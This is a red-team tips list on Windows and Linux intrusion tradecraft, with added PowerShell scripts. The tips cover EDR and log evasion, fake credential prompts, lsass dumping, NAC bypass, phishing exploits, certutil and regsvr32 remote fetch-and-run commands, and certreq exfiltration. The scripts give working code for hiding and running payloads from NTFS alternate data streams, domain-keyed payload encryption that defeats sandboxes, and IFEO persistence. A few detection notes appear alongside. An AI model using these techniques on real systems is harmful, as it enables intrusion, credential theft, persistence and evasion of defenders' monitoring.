I am collecting and writing red team and pentest tips.
Use Symantec's CleanWipe tool for uninstalling SEP (Symantec Endpoint Protection); it removes the product far more thoroughly than the normal uninstaller. The original tip claims it doesn't require Administrator privileges; verify that on the target's version before relying on it.
Scan all the private IP ranges (192.168.0.0/16, 172.16.0.0/12, 10.0.0.0/8) instead of only the ranges you were given; that is how you find forgotten networks and hosts. Make sure the rules of engagement allow it first, since anything outside the agreed scope is off limits otherwise.
Use net user /dom instead of net user /domain. net.exe accepts abbreviated switches, and an endpoint solution or detection rule that matches on the literal string "/domain" in the command line misses the short form.
Use wmiexec instead of psexec; it makes less noise. psexec copies a service binary to the ADMIN$ share and installs a service (a 7045 event in the System log), while wmiexec starts the process over WMI without creating a service. wmiexec is not silent either: by default it writes the command output to a file on ADMIN$, and the spawned cmd.exe has WmiPrvSE.exe as its parent, which process-creation logging picks up.
If you need to put a file on disk, hide it in an NTFS Alternate Data Stream (ADS) of an existing, innocuous file so it does not appear in a normal directory listing. Keep in mind that dir /r and PowerShell's Get-Item -Stream * reveal streams, and most EDRs scan them.
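The ADS tip worked through end to end, as an added example that is not part of the original tip list: stash a payload in a stream of a harmless file, run it straight from the stream, then look at it the way a defender would. The file name, stream name and payload are placeholders chosen for the demo.

```powershell
# Added example (not from the original tip list): hide a payload in an NTFS
# Alternate Data Stream of an innocuous file, use it, and see how it is found.
# $host_file, the stream name 'cfg' and the payload are demo placeholders.
$host_file = "$env:TEMP\notes.txt"
$stream    = 'cfg'                                    # arbitrary stream name
Set-Content -Path $host_file -Value 'shopping list'   # the visible, harmless file

# Write the payload into notes.txt:cfg. Here it is a PowerShell snippet; any bytes
# (a DLL, an exe) can go in the same way with a byte encoding instead of text.
$payload = 'Write-Output "running from an ADS"'
Set-Content -Path $host_file -Stream $stream -Value $payload

# A plain directory listing shows only notes.txt and the size of its main stream
Get-ChildItem $host_file | Select-Object Name, Length

# Run the code straight from the stream; no second file touches the disk
$code = Get-Content -Path $host_file -Stream $stream -Raw
Invoke-Expression $code

# Blue-team view: the streams are one command away. Any stream other than the
# default ':$DATA' on a plain data file deserves a look.
Get-Item -Path $host_file -Stream * | Where-Object Stream -ne ':$DATA' |
    Select-Object FileName, Stream, Length
# cmd.exe equivalent: dir /r %TEMP%

# Clean up the stream; the host file itself stays intact
Remove-Item -Path $host_file -Stream $stream
```

The -Stream parameters need PowerShell 3 or later and an NTFS volume; copying the host file to FAT/exFAT or sending it over a protocol that does not understand streams drops the payload silently.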
If you only have a low-privilege shell, show the user a fake login prompt (for example a dialog that mimics the Windows credential prompt) to harvest their credentials.
If you need plaintext credentials but don't want to run mimikatz on the target, dump the memory of lsass.exe (Task Manager's "Create dump file", procdump, or the MiniDump export of comsvcs.dll all work) and parse the dump offline on your own machine. Expect NTLM hashes rather than plaintext passwords unless WDigest is enabled on the host.
Avoid wtmp/utmp logging by connecting without a pseudo-terminal: ssh -l username target -T. Without a tty the session is never recorded for last, who or w. sshd still logs the authentication itself to auth.log or the journal, so this hides you only from login accounting.
Use kill -9 $$ to avoid leaving a bash history on exit: bash only writes its in-memory history to HISTFILE on a clean exit, and SIGKILL skips that. Unsetting HISTFILE at the start of the session achieves the same thing.
If you have a physical link but NAC is blocking you, listen passively for broadcast and multicast traffic (ARP, LLDP/CDP, mDNS) and collect MAC addresses. Printers usually sit on a MAC-based exception list because they cannot do 802.1X, so spoofing a printer's MAC (and its IP, if the policy binds both) gets you onto the network.
Run loud, obvious activity against the external perimeter (Nessus, Netsparker and similar scanners, or small DoS/DDoS bursts) as a decoy so the blue team is busy with the noise while the real action happens elsewhere. Agree on this in the rules of engagement first; DoS is usually out of bounds.
Use the ROPEMAKER technique (remote CSS that changes what an HTML mail shows after it has been delivered and scanned) and CVE-2017-0199 (Office/WordPad OLE link handling that fetches and executes a remote HTA) for building phishing mails. https://www.mimecast.com/globalassets/documents/whitepapers/wp_the_ropemaker_email_exploit.pdf
You can download any file with the Microsoft-signed certutil.exe like this: certutil -urlcache -split -f <url> <out_filename>. The -urlcache option leaves a copy of the download in the user's URL cache, so clear that cache afterwards (certutil's -urlcache delete option does it).
You can run your own DLLs like this: regsvr32 /s /u dll_name. /s is silent and /u makes regsvr32 call the DLL's DllUnregisterServer export, so put your code there (or in DllMain).
You can run scripts remotely with regsvr32.exe like this: regsvr32 /s /n /u /i:<url> scrobj.dll. /n skips DllRegisterServer and /i passes the URL to scrobj.dll's DllInstall, which fetches the .sct scriptlet from that URL and runs the script inside it without writing anything to disk. The proxy log will show regsvr32.exe fetching a URL, which is an easy detection.
Use an internal SMTP relay for internal phishing: mail sent through it from an internal sender address skips the external spam filters and looks like it came from a colleague.
You can encrypt your payloads and macros using the target company's domain name as the key (environmental keying). The stager derives the key from the domain at run time, so the payload only decrypts on a host in the target's domain and stays opaque in a sandbox or on an analyst's machine that isn't.
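One way to do the domain keying, as an added example that is not part of the original tip list: the attacker-side function encrypts the payload with an AES key derived from the domain name, and the target-side function rebuilds the key from USERDNSDOMAIN and refuses to run anything unless the decrypted text carries a known marker. CORP.EXAMPLE.COM is an assumed target domain, and the demo overrides the environment variable to show both the wrong-domain and right-domain outcomes.

```powershell
# Added example (not from the original tip list): key a payload to the target's
# AD domain so it only decrypts on a host actually joined to that domain.
# 'CORP.EXAMPLE.COM' is an assumed target; the demo sets $env:USERDNSDOMAIN itself.

function Get-DomainKey([string]$Domain) {
    # 256-bit AES key = SHA-256 of the upper-cased domain name
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($Domain.ToUpperInvariant()))
}

function Protect-Payload([string]$Domain, [string]$Script) {
    # Attacker side: run once, ship only the Base64 blob inside the macro/stager.
    # A fixed marker is prepended so a wrong key can never "succeed" into garbage.
    $aes = [System.Security.Cryptography.Aes]::Create()   # CBC + PKCS7 by default
    $aes.Key = [byte[]](Get-DomainKey $Domain)
    $aes.GenerateIV()
    $enc   = $aes.CreateEncryptor()
    $plain = [Text.Encoding]::UTF8.GetBytes('PAYLOAD:' + $Script)
    $ct    = $enc.TransformFinalBlock($plain, 0, $plain.Length)
    [Convert]::ToBase64String([byte[]]($aes.IV + $ct))    # IV (16 bytes) || ciphertext
}

function Unprotect-Payload([string]$Blob) {
    # Target side: the key comes only from the environment, never from the blob
    $domain = $env:USERDNSDOMAIN
    if (-not $domain) { return $null }                    # not domain joined: bail quietly
    $bytes = [Convert]::FromBase64String($Blob)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = [byte[]](Get-DomainKey $domain)
    $aes.IV  = [byte[]]$bytes[0..15]
    try {
        $dec  = $aes.CreateDecryptor()
        $pt   = $dec.TransformFinalBlock($bytes, 16, $bytes.Length - 16)
        $text = [Text.Encoding]::UTF8.GetString($pt)
        if ($text.StartsWith('PAYLOAD:')) { $text.Substring(8) } else { $null }
    } catch {
        # wrong key: PKCS7 padding check fails; treat as "not our target"
        $null
    }
}

# --- demo ---
$target = 'CORP.EXAMPLE.COM'                              # assumed target domain
$blob = Protect-Payload -Domain $target -Script 'Write-Output "hello from $env:COMPUTERNAME"'

$env:USERDNSDOMAIN = 'LAB.LOCAL'                          # simulate a sandbox: wrong domain
'Wrong domain -> "' + [string](Unprotect-Payload $blob) + '"'   # empty string

$env:USERDNSDOMAIN = $target                              # simulate the real target
$script = Unprotect-Payload $blob
if ($script) { Invoke-Expression $script }                # runs only here
```

Anyone who knows or guesses the domain can of course decrypt the blob offline; the point is that an automated sandbox or a generic analyst VM does not have it, so the encrypted stager shows nothing to detonate. In a VBA macro the same derivation works from Environ("USERDNSDOMAIN").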
You can use HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<program.exe> with a Debugger value for persistence: Windows launches the Debugger binary, with the original command line as its arguments, every time that program starts. Writing to HKLM needs administrator rights, and IFEO Debugger values are a well-known persistence indicator that autoruns and Sysmon registry events flag.
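The IFEO persistence set up and then hunted for, as an added example that is not part of the original tip list. notepad.exe is the hijacked program and C:\Tools\payload.exe is an assumed path to your binary; both are demo placeholders, and the script needs an elevated prompt.

```powershell
# Added example (not from the original tip list): IFEO "Debugger" persistence.
# Whenever notepad.exe is launched, Windows starts the Debugger value instead and
# passes the original command line as arguments. Needs an elevated prompt.
# 'notepad.exe' and 'C:\Tools\payload.exe' are demo placeholders.

$Target   = 'notepad.exe'                                  # program to hijack
$Debugger = 'C:\Tools\payload.exe'                         # assumed path to your binary
$Key      = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$Target"

# Set up: create the per-image key and the Debugger value
New-Item -Path $Key -Force | Out-Null
New-ItemProperty -Path $Key -Name Debugger -Value $Debugger -PropertyType String -Force | Out-Null

# Hunter's check: list every image that has a Debugger value. Legitimate entries
# are rare (typically a JIT debugger such as vsjitdebugger.exe), so review each one.
function Get-IfeoDebuggers {
    $root = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    Get-ChildItem -Path $root | ForEach-Object {
        $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { [pscustomobject]@{ Image = $_.PSChildName; Debugger = $dbg } }
    }
}
Get-IfeoDebuggers | Format-Table -AutoSize

# Tear down
Remove-Item -Path $Key -Recurse -Force
```

Your binary receives the hijacked program's full command line as its arguments and should re-launch it, otherwise the user notices that the program never opens. The same Get-IfeoDebuggers check, run at the start of an engagement, also tells you whether a defender (or a previous attacker) already has something there.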
Tune the connection and thread limits when using automated vulnerability scanners; the defaults can saturate links or crash fragile devices and cause network dropouts that draw attention.
You can use Windows's signed certreq.exe for data exfiltration: its -Post option with -config pointing at a URL you control sends the contents of a file as the body of an HTTP(S) POST, so it doubles as a built-in upload tool that blends in with certificate enrollment traffic.